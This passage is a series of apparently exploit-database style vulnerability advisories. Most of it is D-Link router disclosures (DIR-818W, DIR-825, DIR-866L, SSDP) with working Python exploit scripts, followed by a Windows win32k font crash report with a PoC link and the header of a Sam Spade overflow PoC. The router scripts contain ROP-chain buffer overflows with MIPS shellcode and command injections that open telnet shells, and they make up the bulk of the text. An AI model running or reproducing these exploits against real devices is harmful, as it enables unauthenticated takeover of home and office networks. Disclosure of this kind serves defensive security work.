buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="AAAA"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # points to rop3
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian shell
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose and internal
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';echo "<?phpinfo?>" > passwd1.php;telnetd -p 9090;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-818W Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-818W -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-818W firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Reboot shellcode in there
'''
2096 after id GET param, you can control the RA
'''
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #S0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="\x2A\xB1\x4D\xF0" #JUNK S3
buf+="\x2A\xB1\x4D\xF0" #JUNK S4
buf+="\x2A\xB1\x4D\xF0" #JUNK S5
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0" #JUNK S7
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="Y"*120
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
'''
548 characters after SOapaction:http://purenetworks.com/HNAP1/GetDeviceSettings/ should work, although sprintf copies twice so only 242 characters are required including /var/run and /etc/templates/hnap which is concatenated with your string to create 548 characters
'''
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5 JUNK
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="AAAA" #s7 JUNK
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose for v2.02
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-825 (vC) Buffer overflows in authentication,HNAP and ping functionalities. Also a directory traversal
issue exists which can be exploited
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed
issues as per the email communication. The vendor had also released the information on their security advisory
pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly
accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing
this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-825 (vC) -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 4 security issues in DIR-825 firmware which allows an attacker to exploit buffer overflows in
authentication, HNAP and Ping functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited
by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack
directly or using XSRF if not exposed. The ping functionality based buffer overflow and directory traversal would
require an attacker to be on network and use XSRF to exploit buffer overflow whereas would require some sort of
authentication as low privileged user atleast to exploit directory traversal.
## Details
Buffer overflow in auth
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
287 + XXXX in query_string value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "GET /dws/api/Login?test="
buf+="B"*251
buf+="CCCC" #s0
buf+="FFFF" #s1
buf+="FFFF" #s2
buf+="FFFF" #s3
buf+="XXXX" #s4
buf+="HHHH" #s5
buf+="IIII" #s6
buf+="JJJJ" #s7
buf+="LLLL"
buf+="\x2a\xbc\x8c\xa0" # retn address
buf+="C"*24 #
buf+="sh;;"
buf+="K"*20
buf+="\x2a\xc0\xd2\xa0" #s1
buf+="\x2a\xc0\xd2\xa0" #s1
buf
+="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCC"
buf+="&password=A HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml
+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Buffer overflow in HNAP
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
4138 + XXXX in SoapAction value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "POST /HNAP1/ HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="SOAPACTION:http://purenetworks.com/HNAP1/GetDeviceSettings/"+"A"*4138+"\x2a\xbc\x8c\xa0"+"D"*834+"\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: uid:1111;\r\n"
buf+="Content-Length: 13\r\n\r\ntest=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Directory traversal
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
Useful to do directory traversal attack which is possible in html_response_page variable below which prints the
conf file, but theoretically any file, most likely only after login accessible
'''
payload="html_response_page=../etc/host.conf&action=do_graph_auth&login_name=test&login_pass=test1&login_n=test2&l
og_pass=test3&graph_code=63778&session_id=test5&test=test"
buf = "POST /apply.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Buffer overflow in ping
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
282 + XXXX in ping_ipaddr value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
payload="html_response_page=tools_vct.asp&action=ping_test&html_response_return_page=tools_vct.asp&ping=ping&ping_
ipaddr=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"+"\x2a\xbc\x8c\xa0"+"CCXXXXDDDDEEEE&test=test"
buf = "POST /ping_response.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-866L Buffer overflows in HNAP and send email functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF.
## Details
HNAP buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address
buf+="\x2A\xBF\xB9\xF4" #s1 useless
buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address
buf+="DDDD" #s3
buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC
buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2
buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
# Bad chars \x00 - \x20
# sleep address 2ac14c30
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
buf+="1111" #s0 Loaded argument in S0 which is loaded in a0
buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30
buf+="XXXX"
buf+="FFFF" # s3
buf+="XXXX"
buf+="BBBB" # s5
buf+="CCCC" # s6
buf+="DDDD" # s7
buf+="DDDD" # extra pad
buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="XXXX" #
buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode
buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: SSDP command injection using UDP for a lot of Dlink routers including DIR-815, DIR-850L
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
Many Dlink routers affected. Tested on DIR-815.
## Vulnerabilities Summary
DIR-815,850L and most of Dlink routers are susceptible to this flaw. This allows to perform command injection using SSDP packets and on UDP. So no authentication required. Just the fact that the attacker needs to be on wireless LAN or be able to fake a request coming from internal wireless LAN using some other mechanism.
## Details
# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# This vulnerability is pretty much in every router that has cgibin and uses SSDP code in that cgibin. This one worked on the device dir-815. Will work only in WLAN
buf = 'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 9094;ls\r\nMX:2\r\nMAN:"ssdp:discover"\r\n\r\n'
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("239.255.255.250", 1900))
s.send(buf)
s.close()
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
Source: https://code.google.com/p/google-security-research/issues/detail?id=506
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing a specific corrupted TTF font file. The cleanest stack trace we have acquired, which might also indicate where the pool corruption takes place and/or the root cause of the vulnerability, is shown below:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fffff900c4c31000, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000156a34, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000000, (reserved)
[...]
FAULTING_IP:
win32k!memmove+64
fffff960`00156a34 488901 mov qword ptr [rcx],rax
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
CURRENT_IRQL: 0
TRAP_FRAME: fffff880074a0210 -- (.trap 0xfffff880074a0210)
.trap 0xfffff880074a0210
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff47cffffe440 rbx=0000000000000000 rcx=fffff900c4c31000
rdx=000000000141f518 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000156a34 rsp=fffff880074a03a8 rbp=0000000000000010
r8=0000000000000018 r9=0000000000000001 r10=fffff900c4c211a8
r11=fffff900c4c30ff0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
win32k!memmove+0x64:
fffff960`00156a34 488901 mov qword ptr [rcx],rax ds:a020:fffff900`c4c31000=????????????????
.trap
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff800028fa017 to fffff8000287d5c0
STACK_TEXT:
fffff880`074a00a8 fffff800`028fa017 : 00000000`00000050 fffff900`c4c31000 00000000`00000001 fffff880`074a0210 : nt!KeBugCheckEx
fffff880`074a00b0 fffff800`0287b6ee : 00000000`00000001 fffff900`c4c31000 fffff880`074a0400 fffff900`c4c30fd8 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`074a0210 fffff960`00156a34 : fffff960`00252e40 fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 : nt!KiPageFault+0x16e
fffff880`074a03a8 fffff960`00252e40 : fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 fffff960`002525dc : win32k!memmove+0x64
fffff880`074a03b0 fffff960`0031d38e : 00000000`000028a6 fffff900`c4c30fd8 00000000`00000000 fffff900`c4c21008 : win32k!EPATHOBJ::bClone+0x138
fffff880`074a0400 fffff960`000f07bb : fffff880`00002640 fffff900`c576aca0 00000000`00002640 fffff880`00000641 : win32k!RFONTOBJ::bInsertMetricsPlusPath+0x17e
fffff880`074a0540 fffff960`000eccf7 : fffff880`074a2640 fffff880`074a0a68 fffff880`074a0b40 fffff800`00000641 : win32k!xInsertMetricsPlusRFONTOBJ+0xe3
fffff880`074a0610 fffff960`000ec998 : fffff880`074a0b40 fffff880`074a0a68 fffff900`c0480014 00000000`00000179 : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f7
fffff880`074a0690 fffff960`000ec390 : fffff980`00000000 fffff880`074a0830 fffff900`c04a8000 fffff800`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168
fffff880`074a0710 fffff960`000ed841 : 00000000`41800000 00000000`00000000 00000000`0000000a fffff880`074a0830 : win32k!ESTROBJ::vInit+0x350
fffff880`074a07a0 fffff960`000ed4ef : fffff880`074a0ca0 fffff900`c576aca0 ffffd08c`00000020 ffffffff`ffffffff : win32k!GreGetTextExtentExW+0x275
fffff880`074a0a60 fffff800`0287c853 : 00000000`00000000 fffff880`074a0ca0 00000000`00000001 fffff880`00000000 : win32k!NtGdiGetTextExtentExW+0x237
fffff880`074a0bb0 00000000`750a213a : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0025e1c8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x750a213a
---
We have also observed a number of other system bugchecks caused by the particular TTF file with various stack traces indicating a pool corruption condition. For example, on Windows 7 32-bit a crash occurs only while deleting the font, under the following call stack:
---
9823bc7c 90d8dec1 fb634cf0 fb60ecf0 00000001 win32k!RFONTOBJ::vDeleteCache+0x56
9823bca8 90d14209 00000000 00000000 00000001 win32k!RFONTOBJ::vDeleteRFONT+0x190
9823bcd0 90d15e00 9823bcf4 fb62ccf0 00000000 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x6fb
9823bd00 90ddf48e 00000008 fbc16ff8 912f8fc8 win32k!PFTOBJ::bUnloadWorkhorse+0x114
9823bd28 8267ea06 13000117 0040fa24 775e71b4 win32k!GreRemoveFontMemResourceEx+0x60
9823bd28 775e71b4 13000117 0040fa24 775e71b4 nt!KiSystemServicePostCall
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "OS/2" table.
The issue reproduces on Windows 7 (32 and 64-bit). It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it it also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided sample, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding kernel crash log from Windows 7 64-bit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38714.zip
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Browse URL Buffer Overflow PoC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 14/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Eip Overwrite
# Tested on OS : Windows 7 Home Basic
# Crash Point : Go to Tools > Browse Web> Enter the contents of 'sam_spade_browse_url.txt' > OK , Note: Do #Not Remove the http://
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# And the Stack
#0012F73C 41414141 AAAA
#0012F740 41414141 AAAA
#0012F744 DEADBEAF ¯¾Þ
# Registers
#EAX 00000001
#ECX 00000001
#EDX 00000030
#EBX 00000000
#ESP 0012F74C
#EBP 41414141
#ESI 008DA260
#EDI 0176F4E0
#EIP DEADBEAF
